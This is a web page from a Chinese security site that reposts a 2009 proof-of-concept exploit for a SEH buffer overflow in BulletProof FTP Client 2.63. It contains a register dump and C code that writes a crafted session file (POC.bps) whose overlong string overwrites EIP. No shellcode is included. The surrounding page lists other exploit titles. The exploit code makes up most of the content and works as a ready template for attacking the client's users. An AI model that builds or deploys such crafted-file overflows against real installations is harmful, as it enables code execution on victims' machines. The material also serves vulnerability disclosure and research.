首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
BulletProof FTP Client Buffer Overflow (SEH) exploit
来源:vfocus.net 作者:vfocus 发布时间:2009-10-09  
/*
BulletProof FTP Client suffer a buffer overflow (SEH).

Tested on BullerProof FTP Client v. 2.63 build 56 (The last one) but may work with older releases as
well

Registers:

EAX 00000000
ECX 65646362
EDX 7C9032BC ntdll.7C9032BC
EBX 00000000
ESP 0012F1E0
EBP 0012F200
ESI 00000000
EDI 00000000
EIP 65646362
C 0  ES 0023 32bit 0(FFFFFFFF)
P 1  CS 001B 32bit 0(FFFFFFFF)
A 0  SS 0023 32bit 0(FFFFFFFF)
Z 1  DS 0023 32bit 0(FFFFFFFF)
S 0  FS 003B 32bit 7FFDF000(FFF)
T 0  GS 0000 NULL
D 0
O 0  LastErr ERROR_SUCCESS (00000000)
EFL 00010246 (NO,NB,E,BE,NS,PE,GE,LE)
ST0 empty -??? FFFF 00FF00FF 00FF00FF
ST1 empty -??? FFFF 00FF00FF 00FF00FF
ST2 empty -??? FFFF 000000F3 00F300F3
ST3 empty -??? FFFF 000000F3 00F300F3
ST4 empty -??? FFFF 00F4F4F4 00F4F4F4
ST5 empty 7.2337335968722701770e+18
ST6 empty 7.3060737696935038410e+18
ST7 empty 7.0169967652934372810e+18
               3 2 1 0      E S P U O Z D I
FST 0000  Cond 0 0 0 0  Err 0 0 0 0 0 0 0 0  (GT)
FCW 1372  Prec NEAR,64  Mask    1 1 0 0 1 0

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

char *xpl;
char *str;
char message[]="This is a BulletProof FTP Client Session-File and should not be modified
directly.\n";
char trash[]="21\nanything\nbpfdhjomeepehepbflql\nC:\\\n/";

int main(){
    int tam;
    FILE *fp;
    printf("Made by: Rafael Sousa\n");
    printf("Produzido por Rafael Sousa\n");
    str=(char *)malloc(98*sizeof(char));
    memset(str,'a',93);
    str[93]='b';
    str[94]='c';
    str[95]='d';
    str[96]='e';
    str[97]='\0';
    tam=strlen(str)+strlen(message)+strlen(trash);
    printf("%d\n",tam);
    xpl=(char *)malloc((tam+1)*sizeof(char));
    sprintf(xpl,"%s%s\n%s",message,str,trash);
    fp=fopen("POC.bps","w");
    fputs(xpl,fp);
    fclose(fp);
    free(str);
    free(xpl);
    return(0);
}

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·AOL 9.1 SuperBuddy ActiveX Con
·Free WMA MP3 Converter v1.1 (.
·VMware Fusion <= 2.0.5 vmx86 k
·httpdx 1.4 GET Request Remote
·VMware Fusion <= 2.0.5 vmx86 k
·FreeBSD <= 6.4 pipeclose()/knl
·FlatPress 0.804-0.812.1 Local
·FreeBSD version 7.2 VFS/devfs
·Microsoft SRV2.SYS SMB Negotia
·FlatPress versions 0.804 throu
·IBM Installation Manager versi
·Multiple EMC products remote b
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved